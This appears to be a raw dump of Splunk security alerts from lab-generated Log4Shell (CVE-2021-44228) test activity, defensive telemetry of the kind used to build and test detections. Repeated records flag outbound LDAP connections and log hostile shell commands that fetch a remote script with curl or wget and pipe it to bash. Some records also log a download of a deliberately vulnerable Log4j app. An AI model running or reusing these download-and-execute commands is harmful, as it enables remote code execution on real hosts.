annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 12", annotations._all="DE.AE", annotations._all="Actions on Objectives", annotations._all="DE.CM", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1059", annotations._all="T1190", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="CIS 13", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-19T23:10:20", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642638857, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 12", annotations._all="DE.AE", annotations._all="Actions on Objectives", annotations._all="DE.CM", annotations._all="Log4Shell CVE-2021-44228", annotations._all="T1059", annotations._all="T1190", annotations._all="PR.PT", annotations._all="PR.DS", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="CIS 13", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-19T23:10:20", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642638816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="T1105", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The 